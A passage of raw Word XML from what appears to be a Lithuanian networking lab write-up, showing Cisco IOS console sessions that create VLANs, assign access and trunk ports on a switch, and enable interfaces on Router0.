        </w:rPr>
        <w:t>) nustatymai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049EB03" w14:textId="234DD7D1" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DFF8C0" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch&gt;en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F53D5DF" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#conf t</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB7C12C" w14:textId="60C16E7A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD37E82" w14:textId="492AC96A" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C279810" w14:textId="0E042C67" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F5A704" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#vlan 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D40760C" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#name users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293FDA2C" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E1E314" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543F002" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#name server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868175D" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-vlan)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9282F8" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int gig0/2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A19DFD" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode acc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E233B" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F13F6AA" w14:textId="057009A1" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport access vlan 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A270963" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#ex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C4297" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int range fa0/1-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BBCA35" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#switchport mode access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5E1B24" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#switchport access vlan 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F8F0DE" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if-range)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC93B4D" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config)#int gig1/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D50DE" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport mode trunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569CF3F4" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7DA9CA" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#switchport trunk allowed vlan 2,3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037911B6" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch(config-if)#end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15530A0F" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625AA147" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#wr mem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A1A681" w14:textId="49727F9A" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4CE46C" w14:textId="132BF708" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Building configuration...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D9F4FF" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>[OK]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E12267D" w14:textId="286A7FCD" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CB6F0BE" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Switch#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CD4562" w14:textId="4982850B" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C2CD4" w14:textId="77777777" w:rsidR="00D72DCB" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Konfigūruojame Router0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C4BF8" w14:textId="230A5BB0" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="0400AD87" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3086A8" w14:textId="691BE2FB" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router&gt;enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D6B8CA" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#configure terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16805AAE" w14:textId="384FA66D" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enter configuration commands, one per line.</w:t>
      </w:r>
      <w:r w:rsidR="0066332E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>End with CNTL/Z.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E31ED44" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#interface GigabitEthernet0/0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60136ECE" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203F074A" w14:textId="1BB6F50C" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Router(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C63257E" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0345AAEB" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config)#interface GigabitEthernet0/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E094438" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#no shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771569AC" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router(config-if)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6CD7F0" w14:textId="3FB25590" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEC46E4" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router con0 is now available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB69DF" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Press RETURN to get started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7A3032" w14:textId="436DAA17" w:rsidR="18EEACA0" w:rsidRPr="005A5C28" w:rsidRDefault="18EEACA0" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5897522A" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router&gt;en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569061A4" w14:textId="281D797B" w:rsidR="0400AD87" w:rsidRPr="005A5C28" w:rsidRDefault="1D8984A2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Router#conf t</w:t>
      </w:r>
    </w:p>
